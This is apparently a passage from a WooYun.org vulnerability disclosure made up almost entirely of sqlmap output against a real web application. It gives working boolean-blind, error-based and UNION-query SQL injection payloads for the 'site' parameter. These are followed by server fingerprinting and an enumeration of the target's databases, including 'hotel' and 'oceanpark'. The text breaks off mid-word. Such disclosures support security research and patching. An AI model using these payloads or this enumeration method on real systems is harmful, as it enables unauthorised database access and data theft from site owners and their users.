WooYun.org

Parameter: site (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: site=1 AND 8230=8230&page_id=30&ids=733
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: site=1 AND (SELECT 9160 FROM(SELECT COUNT(*),CONCAT(0x716b787a71,(SELECT (ELT(9160=9160,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page_id=30&ids=733
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: site=-6036 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x79495466636247767444,0x716b6b6b71),NULL-- &page_id=30&ids=733
---
[05:26:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.3
back-end DBMS: MySQL 5.0
[05:26:35] [INFO] fetching database names
[05:26:35] [INFO] the SQL query used returns 5 entries
[05:26:35] [INFO] resumed: information_schema
[05:26:35] [INFO] resumed: hotel
[05:26:35] [INFO] resumed: mysql
[05:26:35] [INFO] resumed: oceanpark
[05:26:35] [INFO] resumed: test
available databases [5]:
[*] hotel
[*] information_schema
[*] mysql
[*] oceanpa